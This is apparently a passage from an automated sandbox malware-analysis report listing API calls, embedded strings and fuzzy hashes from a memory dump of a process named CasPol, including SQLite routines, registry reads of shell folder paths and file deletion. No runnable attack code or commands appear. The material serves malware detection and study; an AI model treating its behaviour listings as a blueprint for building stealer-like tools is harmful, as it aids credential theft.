• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
• wcslen.MSVCRT ref: 0040A6B1
• wcscpy.MSVCRT ref: 0040A6C1
• LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
• wcscpy.MSVCRT ref: 0040A6DB
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2767993716-572158859
• Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
• Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
• Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
• Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
APIs
Strings
• database is already attached, xrefs: 0042F721
• attached databases must use the same text encoding as main database, xrefs: 0042F76F
• too many attached databases - max %d, xrefs: 0042F64D
• out of memory, xrefs: 0042F865
• database %s is already in use, xrefs: 0042F6C5
• cannot ATTACH database within transaction, xrefs: 0042F663
• unable to open database: %s, xrefs: 0042F84E
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
• Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
• Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
• Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
• Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
APIs
• DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
• GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
• GetLastError.KERNEL32 ref: 0041855C
• Sleep.KERNEL32(00000064), ref: 00418571
• DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
• GetFileAttributesA.KERNEL32(00000000), ref: 00418581
• GetLastError.KERNEL32 ref: 0041858E
• Sleep.KERNEL32(00000064), ref: 004185A3
• free.MSVCRT ref: 004185AC
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: File$AttributesDeleteErrorLastSleep$free
• String ID:
• API String ID: 2802642348-0
• Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
• Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
• Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
• Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
APIs
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
• memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
• memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
• memset.MSVCRT ref: 0041BA3D
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
• Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
• Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
• Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
• Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
APIs
• GetSystemTime.KERNEL32(?), ref: 00418836
• memcpy.MSVCRT(?,?,00000010), ref: 00418845
• GetCurrentProcessId.KERNEL32 ref: 00418856
• memcpy.MSVCRT(?,?,00000004), ref: 00418869
• GetTickCount.KERNEL32 ref: 0041887D
• memcpy.MSVCRT(?,?,00000004), ref: 00418890
• QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
• memcpy.MSVCRT(?,?,00000008), ref: 004188B6
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• String ID:
• API String ID: 4218492932-0
• Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
• Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
APIs
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
• memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
• memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
• memcpy.MSVCRT(?,?,00000040), ref: 0044A988
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
• memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
• memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
• memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
Strings
Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                          • String ID: gj
                                                                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                                                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                          • String ID: 6$\
                                                                                                                                                                          • API String ID: 404372293-1284684873
                                                                                                                                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                          APIs
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
• String ID:
• API String ID: 4131475296-0
• Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
• Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
• Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
• Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5

APIs
• memset.MSVCRT ref: 004116FF
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2618321458-3614832568
• Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
• Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
• Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
• Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99

APIs
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0
• Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
• Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
• Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
• Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE

APIs
• AreFileApisANSI.KERNEL32 ref: 004174FC
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
• malloc.MSVCRT ref: 00417524
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
• free.MSVCRT ref: 00417544
• free.MSVCRT ref: 00417562
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWidefree$ApisFilemalloc
• String ID:
• API String ID: 4131324427-0
• Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
• Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
• Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
• Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD

APIs
• GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
• GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
• free.MSVCRT ref: 0041822B
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: PathTemp$free
• String ID: %s\etilqs_$etilqs_
• API String ID: 924794160-1420421710
• Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
• Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
• Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
• Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D

APIs
• wcscpy.MSVCRT ref: 0041477F
• wcscpy.MSVCRT ref: 0041479A
• CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004147C1
• CloseHandle.KERNEL32(00000000), ref: 004147C8
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: wcscpy$CloseCreateFileHandle
• String ID: General
• API String ID: 999786162-26480598
• Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
• Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
• Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
• Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669

APIs
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLastMessage_snwprintf
• String ID: Error$Error %d: %s
• API String ID: 313946961-1552265934
• Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
• Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
• Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
• Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59

APIs
Strings
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
• unknown column "%s" in foreign key definition, xrefs: 00431858
• foreign key on %s should reference only one column of table %T, xrefs: 004316CD
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
• Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
• Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99

APIs
• memset.MSVCRT ref: 0044A6EB
• memset.MSVCRT ref: 0044A6FB
• memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
• memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memcpymemset
• String ID: gj
• API String ID: 1297977491-4203073231
• Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
• Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
• Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
• Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                          APIs
                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                          • free.MSVCRT ref: 004174E4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4053608372-0
                                                                                                                                                                          • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                          • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetParent.USER32(?), ref: 0040D453
